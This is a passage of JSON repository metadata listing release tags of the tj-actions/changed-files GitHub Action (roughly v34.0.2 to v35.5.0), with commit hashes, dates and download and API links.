cy_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.5.0/manifests"},{"name":"v35.4.4","sha":"57d9664f8e2aa45f26bcb59095f99aa47ae8e90d","kind":"commit","published_at":"2023-01-19T21:15:50.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.4.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.4.4","dependencies_parsed_at":"2023-11-09T04:04:49.876Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.4.4/manifests"},{"name":"v35.4.3","sha":"0953088baa540166372190bec608cad1603a787d","kind":"commit","published_at":"2023-01-19T00:44:51.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.4.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.4.3","dependencies_parsed_at":"2023-11-09T04:04:49.587Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.4.3/manifests"},{"name":"v35.4.2","sha":"0562b9f865df79542dfcd59cfbd14c9ac9a792d3","kind":"commit","published_at":"2023-01-18T18:54:46.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.4.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.4.2","dependencies_parsed_at":"2023-11-09T04:04:47.349Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.4.2/manifests"},{"name":"v35.4.1","sha":"487675b843e203b5c9a92a07f1ed763d046d7283","kind":"commit","published_at":"2023-01-11T20:58:50.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.4.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.4.1","dependencies_parsed_at":"2023-11-09T04:04:22.919Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.4.1/manifests"},{"name":"v35.4.0","sha":"9a6dabf8d15381f97f1c770257a1a0db59c28a47","kind":"commit","published_at":"2023-01-05T19:24:02.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.4.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.4.0","dependencies_parsed_at":"2023-11-09T04:04:21.208Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.4.0/manifests"},{"name":"v35.3.2","sha":"7839ede089e483df865be448d6f3652f875005e0","kind":"commit","published_at":"2023-01-05T17:19:06.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.3.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.3.2","dependencies_parsed_at":"2023-11-09T04:04:49.176Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.3.2/manifests"},{"name":"v35.3.1","sha":"c2296c1b044b4f5c97d310a6d31e95cbcb5583ec","kind":"commit","published_at":"2023-01-05T09:09:03.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.3.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.3.1","dependencies_parsed_at":"2023-11-09T04:04:21.392Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.3.1/manifests"},{"name":"v35.3.0","sha":"ea251d4d2f03a9c18841ae1b752f58b82dfb4d5e","kind":"commit","published_at":"2023-01-05T01:13:54.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.3.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.3.0","dependencies_parsed_at":"2023-11-09T04:04:19.341Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.3.0/manifests"},{"name":"v35.2.1","sha":"1d1287f9fafd92be283f99b781fb5f00f00dd471","kind":"commit","published_at":"2023-01-02T04:41:47.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.2.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.2.1","dependencies_parsed_at":"2023-11-09T04:04:22.146Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.2.1/manifests"},{"name":"v35.2.0","sha":"392359fc8c85be1a8752e9ab6b1ad9e45158b4a9","kind":"commit","published_at":"2022-12-30T07:03:31.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.2.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.2.0","dependencies_parsed_at":"2023-11-09T04:04:24.153Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.2.0/manifests"},{"name":"v35.1.2","sha":"7f33882a1271950f8592f96b77e694436bfee83b","kind":"commit","published_at":"2022-12-29T21:58:35.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.1.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.1.2","dependencies_parsed_at":"2023-11-09T04:04:21.660Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.1.2/manifests"},{"name":"v35.1.1","sha":"1d8a2f91371fd14ec6146c37cbae79526144fbe9","kind":"commit","published_at":"2022-12-26T07:07:22.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.1.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.1.1","dependencies_parsed_at":"2023-11-09T04:04:50.232Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.1.1/manifests"},{"name":"v35.1.0","sha":"0626c3f94002c0a9d7491dd7fed7055bbdff6f92","kind":"commit","published_at":"2022-12-19T18:00:26.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.1.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.1.0","dependencies_parsed_at":"2023-11-09T04:04:27.572Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.1.0/manifests"},{"name":"v35.0.1","sha":"a2b1e5dbb92d21753cf198228fbf2d0a8557f117","kind":"commit","published_at":"2022-12-19T09:06:52.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.0.1","dependencies_parsed_at":"2023-11-09T04:04:48.387Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.0.1/manifests"},{"name":"v35.0.0","sha":"110b9baa5fc65597d65c1d019c6d3aee16d00c53","kind":"commit","published_at":"2022-12-19T05:16:51.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.0.0","dependencies_parsed_at":"2023-11-09T04:04:51.248Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.0.0/manifests"},{"name":"v34.6.2","sha":"ce4b8e3cba2220de8132ac9721ff754efd6bb7d7","kind":"commit","published_at":"2022-12-16T20:38:54.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.6.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.6.2","dependencies_parsed_at":"2023-11-09T04:04:22.389Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.6.2/manifests"},{"name":"v34","sha":"ce4b8e3cba2220de8132ac9721ff754efd6bb7d7","kind":"commit","published_at":"2022-12-16T20:38:54.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34","dependencies_parsed_at":"2023-11-09T04:04:47.561Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34/manifests"},{"name":"v34.6.1","sha":"3b6c057cd82d1dafab565df2ba9fa489574a03b8","kind":"commit","published_at":"2022-12-14T16:35:11.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.6.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.6.1","dependencies_parsed_at":"2023-11-09T04:04:23.551Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.6.1/manifests"},{"name":"v34.6.0","sha":"4f64429e8be26fe81a594635b07ed829581ea847","kind":"commit","published_at":"2022-12-14T01:58:54.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.6.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.6.0","dependencies_parsed_at":"2023-11-09T04:04:24.583Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.6.0/manifests"},{"name":"v34.5.4","sha":"3f1e44af6ca48144748dfc62a7a6fb22e4ca67f3","kind":"commit","published_at":"2022-12-12T18:49:05.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.5.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.5.4","dependencies_parsed_at":"2023-11-09T04:04:51.654Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.5.4/manifests"},{"name":"v34.5.3","sha":"74dc2e8a7877b725678a2195226bd470f10c481b","kind":"commit","published_at":"2022-12-10T23:50:31.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.5.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.5.3","dependencies_parsed_at":"2023-11-09T04:04:26.079Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.5.3/manifests"},{"name":"v34.5.2","sha":"8356a01788b5a36aa0319e74183f3237e020feac","kind":"commit","published_at":"2022-12-10T08:05:01.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.5.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.5.2","dependencies_parsed_at":"2023-11-09T04:04:21.100Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.5.2/manifests"},{"name":"v34.5.1","sha":"baaf598b46c2d9eb97eb995c9f69d1967349155d","kind":"commit","published_at":"2022-12-05T22:52:03.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.5.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.5.1","dependencies_parsed_at":"2023-11-09T04:04:25.143Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.5.1/manifests"},{"name":"v34.5.0","sha":"8a4cc4fbd67975557b6d85dd302f5f9400b9c92e","kind":"commit","published_at":"2022-11-24T04:07:09.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.5.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.5.0","dependencies_parsed_at":"2023-11-09T04:04:49.592Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.5.0/manifests"},{"name":"v34.4.4","sha":"8a7336fb6f6bc00da867b745d3491de42ac0231b","kind":"commit","published_at":"2022-11-18T13:46:28.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.4.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.4.4","dependencies_parsed_at":"2023-11-09T04:04:23.884Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.4.4/manifests"},{"name":"v34.4.3","sha":"3996bc3fded83a011dbfc57f379fd31266770b3a","kind":"commit","published_at":"2022-11-17T20:15:36.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.4.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.4.3","dependencies_parsed_at":"2023-11-09T04:04:26.116Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.4.3/manifests"},{"name":"v34.4.2","sha":"ef0a29048c50f844e30fac9fef80956f9765aab8","kind":"commit","published_at":"2022-11-15T18:42:00.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.4.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.4.2","dependencies_parsed_at":"2023-11-09T04:04:48.400Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.4.2/manifests"},{"name":"v34.4.1","sha":"3ebdc42d8ba53fedc5bef0f16181249ac58446fa","kind":"commit","published_at":"2022-11-15T17:16:30.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.4.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.4.1","dependencies_parsed_at":"2023-11-09T04:04:22.132Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.4.1/manifests"},{"name":"v34.4.0","sha":"94e6fba8d802f0fa80db51937e8752e9c165ee26","kind":"commit","published_at":"2022-11-11T16:02:44.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.4.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.4.0","dependencies_parsed_at":"2023-11-09T04:04:22.722Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.4.0/manifests"},{"name":"v34.3.4","sha":"3dbb79f46716e706df6be563a268df44b264b545","kind":"commit","published_at":"2022-11-08T20:13:51.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.3.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.3.4","dependencies_parsed_at":"2023-11-09T04:04:47.571Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.3.4/manifests"},{"name":"v34.3.3","sha":"991e8b3aae0ebbe0614b15b05d14ccb92affa24a","kind":"commit","published_at":"2022-11-08T18:26:37.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.3.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.3.3","dependencies_parsed_at":"2023-11-09T04:04:48.359Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.3.3/manifests"},{"name":"v34.3.2","sha":"72d3bb8b336df0723f5c9e9d5875c61bf7bdfe9f","kind":"commit","published_at":"2022-11-07T15:23:09.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.3.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.3.2","dependencies_parsed_at":"2023-11-09T04:04:26.775Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.3.2/manifests"},{"name":"v34.3.1","sha":"72d3bb8b336df0723f5c9e9d5875c61bf7bdfe9f","kind":"commit","published_at":"2022-11-07T15:23:09.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.3.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.3.1","dependencies_parsed_at":"2023-11-09T04:04:22.428Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.3.1/manifests"},{"name":"v34.3.0","sha":"5f89dc7d6eefdcb7323e773671fd3461a7c2f050","kind":"commit","published_at":"2022-11-07T06:51:55.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.3.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.3.0","dependencies_parsed_at":"2023-11-09T04:04:19.473Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.3.0/manifests"},{"name":"v34.2.2","sha":"734bb168e38279dfc7aa2af5d5be3a1475427a99","kind":"commit","published_at":"2022-11-06T17:46:31.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.2.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.2.2","dependencies_parsed_at":"2023-11-09T04:04:23.490Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.2.2/manifests"},{"name":"v34.2.1","sha":"d2e030b6ed85ce2db7ac1a4afc574640df8bca26","kind":"commit","published_at":"2022-11-05T09:13:05.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.2.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.2.1","dependencies_parsed_at":"2023-11-09T04:04:19.339Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.2.1/manifests"},{"name":"v34.2.0","sha":"6ba3c59bc6825f1ad375d92a9e70c6b275db0ddd","kind":"commit","published_at":"2022-11-05T01:44:59.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.2.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.2.0","dependencies_parsed_at":"2023-11-09T04:04:23.484Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.2.0/manifests"},{"name":"v34.1.1","sha":"d0e44775cd5572bb0ead1d7d2e399015644f7359","kind":"commit","published_at":"2022-11-04T02:44:37.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.1.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.1.1","dependencies_parsed_at":"2023-11-09T04:04:47.287Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.1.1/manifests"},{"name":"v34.1.0","sha":"b91acef304123e58fd6671ab267d6b5e2a7f2ef3","kind":"commit","published_at":"2022-11-04T00:43:50.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.1.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.1.0","dependencies_parsed_at":"2023-11-09T04:04:22.124Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.1.0/manifests"},{"name":"v34.0.5","sha":"12633630aba2ab48ec2ad8a3344dd736d61a7b89","kind":"commit","published_at":"2022-11-02T21:38:04.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.0.5","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.0.5","dependencies_parsed_at":"2023-11-09T04:04:47.187Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.0.5/manifests"},{"name":"v34.0.4","sha":"71840771e95943b1ab0c8f8ae45aeb0a34458e2e","kind":"commit","published_at":"2022-11-02T15:35:43.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.0.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.0.4","dependencies_parsed_at":"2023-11-09T04:04:23.852Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.0.4/manifests"},{"name":"v34.0.3","sha":"cbfb0fda5afcfbf4ef0ef854bf0d8210abd0866f","kind":"commit","published_at":"2022-11-02T14:52:34.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.0.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.0.3","dependencies_parsed_at":"2023-11-09T04:04:47.571Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.0.3/manifests"},{"name":"v34.0.2","sha":"932dad31974f07bd23cab5870d45c6e5ad5c8b73","kind":"commit","published_at":"2022-10-31T04:43:09.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.0.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.0.2","dependencies_parsed_at":"2023-11-09T04:04:22.385Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.0.2","manifests_url":"